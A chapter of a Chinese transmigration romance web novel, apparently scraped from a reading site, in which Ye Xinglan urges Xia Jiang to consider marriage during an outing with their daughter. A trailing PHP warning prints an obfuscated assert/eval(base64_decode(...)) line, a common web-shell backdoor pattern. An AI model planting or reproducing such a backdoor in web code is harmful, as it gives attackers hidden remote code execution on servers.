99书盟 > 玄幻小说 > 老公是个女儿控[穿书] > 正文 第21章 第 21 章
    夏江看着眼前一脸认真的男人, 面无表情,然后默默在心里骂了一句“沙币”。

    这人长得挺帅的,怎么脑子有问题呢?

    真是白瞎了这张脸。

    夏江与男人对视片刻,莞尔露出一个淡定温柔的微笑, 问“要不, 我们还是谈回啾啾的事情?”

    叶星澜抬眸看夏江,目光和说话的语气都是尽可能的平淡温和, 毕竟上次他把人给吓唬哭了, 这次他不想又把她说哭了。

    叶星澜说“我一直觉得你都在逃避, 不管是关于夏啾啾的事情,还是关于你的事情。”

    闻言, 夏江沉默了一下,然后抬头看着他, 有些认真地问“有吗?”

    叶星澜“嗯”了一声,“你给我的感觉一直很奇怪。”

    夏江看着叶星澜, 说“可能是因为你脑子不好使。”

    叶星澜看着夏江,只见她故作淡定, 丝毫没有被人戳破心事的感觉。

    他隐隐觉得有些好笑,不过他表面还是一副淡然的模样, 对夏江说“你在转移话题。”

    涂鸦体验馆的一节画画课是四十五分钟, 夏啾啾快要下课了。

    在夏啾啾下课之前, 叶星澜对夏江说了他想说的话“你很奇怪, 你对啾啾像是关心, 又像是不关心,你对我的态度更是十分明显的抗拒。”

    他看着夏江, 问“所以我在想, 你当时是抱着怎样的心态把啾啾生下来的呢?”

    关于“夏江”是抱着怎样的心态把啾啾生下来的这个问题, 她自然也是不知道的。

    面对叶星澜的提问,夏江半真半假、含糊不清地回答“或许是当时年轻不懂事吧,稀里糊涂就生下来了。”

    夏江实在是不喜欢和叶星澜聊天。

    她觉得这人岁数比她大,经历的事情比她多,又是小孩的亲生父亲,肯定多少能看出她的不对劲。

    叶星澜不认同夏江的这种“稀里糊涂”,但是能理解当时年仅20岁善良女人的想法。

    ——毕竟这是一条生命,她没有办法做出谋害无辜生命的行为,以致于她在纠结当中把孩子生下来了。

    叶星澜垂眸,抿了一口咖啡,并没有抬头看夏江。

    他说“夏江,或许你现在后悔了。可是当时做出选择的是你,你有义务为你当初做出的决定负责。”

    “当初确实有我不对的地方,但是造成如今啾啾和你、啾啾和我,以及我和你之间复杂关系的人是你,而你在逃避,不肯面对。”

    “我不是在要求你什么,只是觉得你可以考虑一下你和啾啾、和我之间的关系。”

    “如果以后你都是要嫁人、我都是要娶妻的话,为什么我们之间完全没有可能?”

    “…………”

    夏江只是一个小姑娘,她有些玻璃心,难免被他说得有些难受了。

    只是听到最后,她就幽幽地看着叶星澜。

    她说“懂了,你是想帮啾啾找个免费保姆而已。”

    叶星澜“你怎么知道我不是喜欢你的呢?”

    关于这点,夏江一点儿都不担心。

    她看着叶星澜,十分真诚地问“你不是只喜欢工作吗?”

    这话问得叶星澜无话可说、心生佩服。

    他已经开始怀疑那个乖巧可爱的夏啾啾到底是不是夏江亲生的。

    叶星澜抿了一口咖啡,然后冷静下来了,没有被夏江的话带偏。

    他看着夏江,有些认真地说“赵家的联姻,我可以毫不犹豫选择拒绝;而你,我有认真考虑过举办婚礼。”

    关于婚礼的事情,这不是他第一次向夏江提起。

    以他的性格肯定是想好了、确定好了,才会向别人提。

    叶星澜不敢说他作为丈夫会对妻子多好,但是放眼祁城,硬件条件比他优越的男人并没有几个。

    或许夏江以后能遇到一个爱她、疼她的丈夫。

    可是他觉得他也可以做到,所以为什么她的丈夫不能是他呢?

    ……

    四十五分钟的画画课很快就结束了。

    夏啾啾拿着老师帮她吹干的画跑出来,献宝似的递给夏江看,那双圆溜溜的眼睛写满“妈咪快点夸我”的期盼。

    夏江看了看那副不知道内容是什么的画,又看了看小孩充满期待的眼神,只好捂着良心夸她。

    夏江“哇,啾啾画得真好看!”

    说完,她伸手揉揉小孩的头“啾啾真棒。”

    叶萌萌看到夏啾啾被漂亮姐姐夸了,她也献宝似的把画举高高给夏江看,同样是眼神充满期待。

    叶萌萌我也要漂亮姐姐夸!

    夏江只好继续营业“哇,萌萌也很棒哦。”

    虽然夏江同样不知道叶萌萌画的是什么,但是这不影响她夸萌萌。

    小孩刚上完画画课,难免弄得满手都是颜料,夏江只好一手牵着一个小朋友带她们去洗手。

    上完涂鸦画画的体验课,叶星澜准备带她们去水果园采摘草莓了。

    夏啾啾挺喜欢今天的涂鸦画画课,夏江问她下个周末还要不要过来上课,她犹豫了一会儿,然后小声地问“姐姐会和啾啾一起来吗?”

    如果不是她的妈咪和她一起来,那她就不来了。

    夏江愣了一下,她没想到夏啾啾会考虑这么多。

    夏江想了想,就说“有时候是姐姐和啾啾一起过来,有时候是爸爸和啾啾一起过来。”

    小孩听她这么说,有些纠结,秀气的眉毛都皱起来了。

    小孩纠结了好一会儿,终于下定了决定“啾啾还要来画画。”

    说完,她又开始向夏江撒娇了“以后姐姐带啾啾来画画好不好~~啾啾把最好看的画都送给姐姐~~~”

    听到小孩和夏江的对话,以及小孩的撒娇,叶星澜只觉得他又双叒叕遭小孩嫌弃了。

    叶星澜觉得他家小孩也太双标了吧?

    叶萌萌听到夏啾啾下个星期还要过来,就朝叶岚嚷嚷她下个星期也要和夏啾啾一起过来画画。

    叶岚心想真是为难她了,这么爱动的性格,居然要安安分分坐在教室里画画。

    不过叶岚向来拿他家的小姑奶奶没有办法,只好答应她的要求,下周继续过来。

    从涂鸦体验馆出来,几人就去了祁城郊区的水果园。

    水果园里种植的水果品种不是很多,草莓种植面积最广,叶星澜就是打算带小孩来摘草莓的。

    夏啾啾喜欢吃车厘子,也喜欢吃草莓。

    虽然水果园没有车厘子,但是有草莓她也会十分高兴的!

    两个小孩从工作人员那儿领了篮子,一人手里拿着一个篮子,模样有些可爱。

    工作人员教她们怎么采摘草莓之后,两个小孩就迫不及待去采摘草莓了。

    夏江看着前面两个蹲下来摘草莓的小孩,心想她闲着也是闲着,就向工作人员要了一个篮子,过去一起摘草莓。

    叶岚看到夏江走开了,就转头看他身旁的叶星澜。

    叶岚不是傻子,自然察觉他们的气场有些不对劲,顿时看叶星澜的眼神充满了同情。

    他同情之中带着一点儿的幸灾乐祸,问“哥,你和我当初一样,追妻火葬场?”

    叶星澜没听懂,有些困惑地看了一下叶岚。

    叶岚十分热心地科普“就是一开始男人对女人爱理不理的,或者做了不好的事情,最后为了讨好女人不得不做了好多好多好多事情来弥补……”

    叶星澜“…………”

    叶星澜“你也少看点网络小说吧。”

    叶岚耸了耸肩。

    因为夏江加入了两位小孩采摘草莓的行列,采摘效率大大提高,很快三人的篮子都装满了草莓。

    夏啾啾和叶萌萌都是第一次来水果园摘草莓,感到十分新鲜,等夏江帮她们称了重、付了钱,她们就开始嚷嚷要吃草莓。

    水果园的工作人员知道会有这样的小朋友游客,就帮她们洗了几个草莓,放在塑料包装盒给她们。

    夏啾啾和叶萌萌拿到属于自己的草莓,这草莓还是自己亲手摘的,心里十分高兴,甚至她们把她们的草莓换着吃。

    从水果园离开,几人在外面吃了中午饭才回家。

    夏江一想到苏文燕总是挽留她,顿时不想回叶家了,就让叶星澜送她回去她的那个一房一厅。

    叶星澜“嗯”了一声,没有多说什么。

    到了楼下,惦记着写稿的夏江准备下车了。

    结果夏江还没起身,小孩揪住了她的衣摆,开始可怜巴巴地看着她。

    小孩想和她的妈咪一起回去,这个周末想和她的妈咪在一起。

    夏江愣了一下,下意识想要拒绝,可是话还没说出来,突然想起今天叶星澜对她说的话。

    夏江抬头看叶星澜,叶星澜也在看她。

    他的脸上表情淡淡的,仿佛眼前只是一件很小很小的事情,小到几乎可以算是无事发生,没什么好在意的。

    夏江把话咽回去了,她伸手揉揉小孩的脑袋,有些温柔地问“啾啾是想和姐姐一起回去吗?”

    小孩点头,圆溜溜的大眼看着夏江。

    她又开始朝夏江撒娇了“啾啾就是想和妈咪一起~~”

    小孩的撒娇让夏江忍不住笑了,她只好对叶星澜说“麻烦小叶先生明天过来接啾啾了。”

    叶星澜抬眸看了看夏江,语气有些温和“不麻烦。”

    叶星澜知道他今天说的话有被夏江听进去了。

    因为周末多带夏啾啾一天,夏江周日下午和周一赶稿赶得命都快没有了。

    好不容易赶完稿子,夏江给老板发了过去,整个人松懈下来了,只觉得累得不行。

    夏江躺在床上,心想24岁的身体和20岁的身体还是有差别的。

    以前她连续18小时通宵赶稿,哪有现在连续18小时赶稿这么累,果然不同年龄的身体差别还是挺大的。

    想想,夏江觉得她好像亏了几年的青春。

Warning: assert() [function.assert]: Assertion "$婐疬寰鳍= eval(base64_decode($嚚戥呷));" failed in E:\Web\99shumeng\modules\article\reader.php on line 2